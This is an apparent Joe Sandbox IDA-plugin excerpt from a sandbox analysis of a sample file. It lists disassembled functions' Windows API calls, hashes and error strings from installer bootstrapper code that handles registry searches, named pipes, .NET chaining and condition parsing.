                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$FreeHeap$AllocateCompareProcess
                                                                                                                • String ID: ($@$`<u$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
                                                                                                                • API String ID: 1555028553-639730868
                                                                                                                • Opcode ID: 71f1c7ea2768473bfb1cef67d82f039e3707377d7420f96a001ba7c639f03734
                                                                                                                • Instruction ID: f2b5c2da95be9dd40cc221d939a792f1cb3b50c2ac73bbf9b6c00e06ac6121a9
                                                                                                                • Opcode Fuzzy Hash: 71f1c7ea2768473bfb1cef67d82f039e3707377d7420f96a001ba7c639f03734
                                                                                                                • Instruction Fuzzy Hash: 65B1B07194826ABBDB129BE5CC81FAEB778BB05720F200754F521AB1D1DB71EE10CB91
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00A03E78,000000FF,?,?,?), ref: 009E71D4
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 009E71F9
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 009E7219
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 009E7235
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 009E725D
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 009E7279
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 009E72B2
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 009E72EB
                                                                                                                  • Part of subcall function 009E6D50: SysFreeString.OLEAUT32(00000000), ref: 009E6E89
                                                                                                                  • Part of subcall function 009E6D50: SysFreeString.OLEAUT32(00000000), ref: 009E6EC8
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E736F
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E741F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Compare$Free
                                                                                                                • String ID: ($`<u$atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                • API String ID: 318886736-2569518843
                                                                                                                • Opcode ID: 7af43a751aa6e5fe5a18089044215bb372f87f044da26ef3ca3a8f6f485c4e01
                                                                                                                • Instruction ID: f982a675d7085a770fd785b88341a172edf527de000eebd2a20edc11d9132bf4
                                                                                                                • Opcode Fuzzy Hash: 7af43a751aa6e5fe5a18089044215bb372f87f044da26ef3ca3a8f6f485c4e01
                                                                                                                • Instruction Fuzzy Hash: 93A1923194825AFBDB229BD5CC41FAEBB69BB04730F204755F920A61D1D770EE10DB92
                                                                                                                APIs
                                                                                                                • UuidCreate.RPCRT4(?), ref: 009CD4B3
                                                                                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 009CD4DC
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 009CD5C5
                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 009CD5CF
                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 009CD668
                                                                                                                • WaitForSingleObject.KERNEL32(009EB500,000000FF,?,?,?,?), ref: 009CD673
                                                                                                                • ReleaseMutex.KERNEL32(009EB500,?,?,?,?), ref: 009CD69D
                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 009CD6BE
                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 009CD6CC
                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 009CD704
                                                                                                                  • Part of subcall function 009CD33E: WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,009CD642,?), ref: 009CD357
                                                                                                                  • Part of subcall function 009CD33E: ReleaseMutex.KERNEL32(?,?,?,?,009CD642,?), ref: 009CD375
                                                                                                                  • Part of subcall function 009CD33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 009CD3B6
                                                                                                                  • Part of subcall function 009CD33E: ReleaseMutex.KERNEL32(?), ref: 009CD3CD
                                                                                                                  • Part of subcall function 009CD33E: SetEvent.KERNEL32(?), ref: 009CD3D6
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 009CD7B9
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 009CD7D1
                                                                                                                Strings
                                                                                                                • Failed to create netfx chainer guid., xrefs: 009CD4C0
                                                                                                                • %ls /pipe %ls, xrefs: 009CD57F
                                                                                                                • Failed to convert netfx chainer guid into string., xrefs: 009CD4FB
                                                                                                                • Failed to CreateProcess on path: %ls, xrefs: 009CD5FE
                                                                                                                • Failed to wait for netfx chainer process to complete, xrefs: 009CD732
                                                                                                                • Failed to get netfx return code., xrefs: 009CD6FA
                                                                                                                • Failed to process netfx chainer message., xrefs: 009CD648
                                                                                                                • Failed to allocate netfx chainer arguments., xrefs: 009CD593
                                                                                                                • NetFxEvent.%ls, xrefs: 009CD52B
                                                                                                                • D, xrefs: 009CD5AA
                                                                                                                • Failed to create netfx chainer., xrefs: 009CD55E
                                                                                                                • Failed to allocate section name., xrefs: 009CD51D
                                                                                                                • NetFxSection.%ls, xrefs: 009CD509
                                                                                                                • NetFxChainer.cpp, xrefs: 009CD4F1, 009CD5F3, 009CD6F0, 009CD728
                                                                                                                • Failed to allocate event name., xrefs: 009CD53F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
                                                                                                                • String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
                                                                                                                • API String ID: 1533322865-1825855094
                                                                                                                • Opcode ID: d0acab374c4a0d2ad8670648ced2a73b00e45b49e8b3dc54696e0fecc9f0e74b
                                                                                                                • Instruction ID: 6589fb0403579c12a928e15ca5d833fd703215a4591d116e89f0d8dea24c4d17
                                                                                                                • Opcode Fuzzy Hash: d0acab374c4a0d2ad8670648ced2a73b00e45b49e8b3dc54696e0fecc9f0e74b
                                                                                                                • Instruction Fuzzy Hash: 5BA17F72D41228ABDB219BA4CD85FAEB7B8BB44710F114569FA08FB291D7349D408F92
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,00000000,?,009EB500,?,00000000,?,009A452F,?,009EB500), ref: 009B54FD
                                                                                                                • GetCurrentProcessId.KERNEL32(?,009A452F,?,009EB500), ref: 009B5508
                                                                                                                • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,009A452F,?,009EB500), ref: 009B553F
                                                                                                                • ConnectNamedPipe.KERNEL32(?,00000000,?,009A452F,?,009EB500), ref: 009B5554
                                                                                                                • GetLastError.KERNEL32(?,009A452F,?,009EB500), ref: 009B555E
                                                                                                                • Sleep.KERNEL32(00000064,?,009A452F,?,009EB500), ref: 009B5593
                                                                                                                • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,009A452F,?,009EB500), ref: 009B55B6
                                                                                                                • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,009A452F,?,009EB500), ref: 009B55D1
                                                                                                                • WriteFile.KERNEL32(?,009A452F,009EB500,00000000,00000000,?,009A452F,?,009EB500), ref: 009B55EC
                                                                                                                • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,009A452F,?,009EB500), ref: 009B5607
                                                                                                                • ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,009A452F,?,009EB500), ref: 009B5622
                                                                                                                • GetLastError.KERNEL32(?,009A452F,?,009EB500), ref: 009B567D
                                                                                                                • GetLastError.KERNEL32(?,009A452F,?,009EB500), ref: 009B56B1
                                                                                                                • GetLastError.KERNEL32(?,009A452F,?,009EB500), ref: 009B56E5
                                                                                                                • GetLastError.KERNEL32(?,009A452F,?,009EB500), ref: 009B5719
                                                                                                                • GetLastError.KERNEL32(?,009A452F,?,009EB500), ref: 009B574A
                                                                                                                • GetLastError.KERNEL32(?,009A452F,?,009EB500), ref: 009B577B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                                                                • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
                                                                                                                • API String ID: 2944378912-2047837012
                                                                                                                • Opcode ID: b43903f605471ac09adc6c46aea3738c7dc1b677398812bf7093911550889a0b
                                                                                                                • Instruction ID: 3241c27076328d2724a73d37a62e645f7bd2763e0a99580107d69ddc111f95c1
                                                                                                                • Opcode Fuzzy Hash: b43903f605471ac09adc6c46aea3738c7dc1b677398812bf7093911550889a0b
                                                                                                                • Instruction Fuzzy Hash: C571C776E45639ABDB2096A58D89BEF76ACAF44B30F134525BE10FF180DB749D0087E0
                                                                                                                APIs
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009AA45A
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009AA480
                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 009AA768
                                                                                                                Strings
                                                                                                                • Failed to allocate memory registry value., xrefs: 009AA587
                                                                                                                • Failed to change value type., xrefs: 009AA70F
                                                                                                                • Failed to format key string., xrefs: 009AA465
                                                                                                                • Failed to get expand environment string., xrefs: 009AA6DD
                                                                                                                • Failed to query registry key value size., xrefs: 009AA554
                                                                                                                • Failed to query registry key value., xrefs: 009AA5DA
                                                                                                                • Unsupported registry key value type. Type = '%u', xrefs: 009AA608
                                                                                                                • Failed to open registry key., xrefs: 009AA4ED
                                                                                                                • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 009AA740
                                                                                                                • Registry key not found. Key = '%ls', xrefs: 009AA4B4
                                                                                                                • search.cpp, xrefs: 009AA54A, 009AA57D, 009AA5D0, 009AA6D3
                                                                                                                • Failed to set variable., xrefs: 009AA72B
                                                                                                                • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 009AA51C
                                                                                                                • Failed to allocate string buffer., xrefs: 009AA667
                                                                                                                • Failed to clear variable., xrefs: 009AA4D8
                                                                                                                • Failed to format value string., xrefs: 009AA48B
                                                                                                                • Failed to read registry value., xrefs: 009AA6F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open@16$Close
                                                                                                                • String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                                                                                • API String ID: 2348241696-3124384294
                                                                                                                • Opcode ID: f760a84c86347aa190eaa05111b60e9fd05b09e0c96afaa515f8ba160678e269
                                                                                                                • Instruction ID: 4d3ca41552e13e92fade0fe79d2ef8a78781f07488ad65760fd554de4a41b6fd
                                                                                                                • Opcode Fuzzy Hash: f760a84c86347aa190eaa05111b60e9fd05b09e0c96afaa515f8ba160678e269
                                                                                                                • Instruction Fuzzy Hash: 12A1F672D00229BBCF229AE5CC45FAFBA78AF4A710F158521F910BA151D7759E00DBE2
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,009AA8B4,00000100,000002C0,000002C0,00000100), ref: 009A5795
                                                                                                                • lstrlenW.KERNEL32(000002C0,?,009AA8B4,00000100,000002C0,000002C0,00000100), ref: 009A579F
                                                                                                                • _wcschr.LIBVCRUNTIME ref: 009A59A7
                                                                                                                • LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,009AA8B4,00000100,000002C0,000002C0,00000100), ref: 009A5C4A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                                                                                • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                                                                                • API String ID: 1026845265-2050445661
                                                                                                                • Opcode ID: 4f02db026b47ca2de32c2f911f70579fc33305cf847bb2ccf2d0c562b770f4c7
                                                                                                                • Instruction ID: ba024a86649102265806c65483f48726f5b0c30b73e08f3eba6e47dbf5f81d37
                                                                                                                • Opcode Fuzzy Hash: 4f02db026b47ca2de32c2f911f70579fc33305cf847bb2ccf2d0c562b770f4c7
                                                                                                                • Instruction Fuzzy Hash: C2F1C771A01659EFCF11DFA58841EAF7BB8EB85B20F168529FD14AB240D7349E01CBE0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,009CD558,?,?,?), ref: 009CCEC7
                                                                                                                • GetLastError.KERNEL32(?,?,009CD558,?,?,?), ref: 009CCED4
                                                                                                                • ReleaseMutex.KERNEL32(?), ref: 009CD13C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
                                                                                                                • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                                                                • API String ID: 3944734951-2991465304
                                                                                                                • Opcode ID: 4a560dbf56ba6b214f1ccbe4a66cdbac7e6c5a094abf695eb8b8b2a563100b9a
                                                                                                                • Instruction ID: 193922f643e7d6f63d63bffb20abb198a6c6ab5c00c452dd3a90b2c2b39ee298
                                                                                                                • Opcode Fuzzy Hash: 4a560dbf56ba6b214f1ccbe4a66cdbac7e6c5a094abf695eb8b8b2a563100b9a
                                                                                                                • Instruction Fuzzy Hash: FC8149B6E45726BBC7218B698C49F5BBEA4BF05720F014529FE18AB381D734DD00CAE5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E32F3: VariantInit.OLEAUT32(?), ref: 009E3309
                                                                                                                  • Part of subcall function 009E32F3: SysAllocString.OLEAUT32(?), ref: 009E3325
                                                                                                                  • Part of subcall function 009E32F3: VariantClear.OLEAUT32(?), ref: 009E33AC
                                                                                                                  • Part of subcall function 009E32F3: SysFreeString.OLEAUT32(00000000), ref: 009E33B7
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,009ECA9C,?,?,Action,?,?,?,00000000,009A5445), ref: 009AEB13
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 009AEB5D
                                                                                                                Strings
                                                                                                                • Failed to get RelatedBundle element count., xrefs: 009AEA97
                                                                                                                • Failed to get RelatedBundle nodes, xrefs: 009AEA72
                                                                                                                • Failed to resize Detect code array in registration, xrefs: 009AEC2E
                                                                                                                • Detect, xrefs: 009AEB04
                                                                                                                • Action, xrefs: 009AEAD0
                                                                                                                • RelatedBundle, xrefs: 009AEA50
                                                                                                                • Upgrade, xrefs: 009AEB50
                                                                                                                • Invalid value for @Action: %ls, xrefs: 009AEC52
                                                                                                                • Patch, xrefs: 009AEBDD
                                                                                                                • comres.dll, xrefs: 009AEB26
                                                                                                                • cabinet.dll, xrefs: 009AEBBA
                                                                                                                • Failed to get @Action., xrefs: 009AEC69
                                                                                                                • Failed to resize Patch code array in registration, xrefs: 009AEC43
                                                                                                                • Failed to get next RelatedBundle element., xrefs: 009AEC70
                                                                                                                • Failed to resize Upgrade code array in registration, xrefs: 009AEC35
                                                                                                                • Addon, xrefs: 009AEB9A
                                                                                                                • version.dll, xrefs: 009AEB70
                                                                                                                • Failed to get @Id., xrefs: 009AEC62
                                                                                                                • Failed to resize Addon code array in registration, xrefs: 009AEC3C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
                                                                                                                • API String ID: 702752599-259800149
                                                                                                                • Opcode ID: 0fcd771e0da1b41fafd88539b894f7de07635e467f96326df90b7a7b08bf3253
                                                                                                                • Instruction ID: 25d936380dfbda54975081165965cc42c87ba6db87108b19e6f4ec9c5c563d21
                                                                                                                • Opcode Fuzzy Hash: 0fcd771e0da1b41fafd88539b894f7de07635e467f96326df90b7a7b08bf3253
                                                                                                                • Instruction Fuzzy Hash: 2E718C31A0462AFBCB11DFA4C945EAEB7B4FB46724F204254FA61A72C1D774AE11CBD0
                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,009B4BF5,009EB4E8,?,feclient.dll,00000000,?,?), ref: 009B46F3
                                                                                                                • ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,009B4BF5,009EB4E8,?,feclient.dll,00000000,?,?), ref: 009B4714
                                                                                                                • GetLastError.KERNEL32(?,009B4BF5,009EB4E8,?,feclient.dll,00000000,?,?), ref: 009B471A
                                                                                                                • ReadFile.KERNEL32(feclient.dll,00000000,009EB518,?,00000000,00000000,009EB519,?,009B4BF5,009EB4E8,?,feclient.dll,00000000,?,?), ref: 009B47A8
                                                                                                                • GetLastError.KERNEL32(?,009B4BF5,009EB4E8,?,feclient.dll,00000000,?,?), ref: 009B47AE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastRead$CurrentProcess
                                                                                                                • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
                                                                                                                • API String ID: 1233551569-452622383
                                                                                                                • Opcode ID: 942b62290ab71fbe150aff62192f2e389f5f5807e1a7a085a6c4c55613801b6a
                                                                                                                • Instruction ID: 28e3c9d792362b0ca960dbad1d9688f061fc08a591ad6fac7bc8c3acb83c8536
                                                                                                                • Opcode Fuzzy Hash: 942b62290ab71fbe150aff62192f2e389f5f5807e1a7a085a6c4c55613801b6a
                                                                                                                • Instruction Fuzzy Hash: AE51E736E84269B7DB219AD58D86FBF766CAB81B30F110125FF10BB182D7749D00A7E1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StringVariant$AllocClearFreeInit
                                                                                                                • String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
                                                                                                                • API String ID: 760788290-1911311241
                                                                                                                • Opcode ID: 0395825583aa3fafdf81482f139d558f9d2de2a90fdd3537017184708745b0b7
                                                                                                                • Instruction ID: 032a59f1135dc2ae60243d7f2dfbc22f904f810329de60b4b2bb669704a03dd5
                                                                                                                • Opcode Fuzzy Hash: 0395825583aa3fafdf81482f139d558f9d2de2a90fdd3537017184708745b0b7
                                                                                                                • Instruction Fuzzy Hash: 91411A71E8876AB6CA215B64CD02F7AB2586B51B34F240329FB24BB2D5CB749D0093D3
                                                                                                                APIs
                                                                                                                • GetStringTypeW.KERNEL32(00000001,56009EDB,00000001,?,009A9946,?,00000000,00000000,?,?,009A992E,?,?,00000000,?), ref: 009A8FB2
                                                                                                                Strings
                                                                                                                • condition.cpp, xrefs: 009A9084, 009A914E, 009A91CA, 009A922E, 009A936C, 009A93B0, 009A93F4
                                                                                                                • Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 009A9242
                                                                                                                • Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 009A9408
                                                                                                                • AND, xrefs: 009A92BC
                                                                                                                • NOT, xrefs: 009A92DB
                                                                                                                • Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 009A91DE
                                                                                                                • Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 009A93C4
                                                                                                                • Failed to set symbol value., xrefs: 009A9060
                                                                                                                • -, xrefs: 009A9118
                                                                                                                • Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 009A9380
                                                                                                                • Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 009A9098
                                                                                                                • Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 009A9162
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
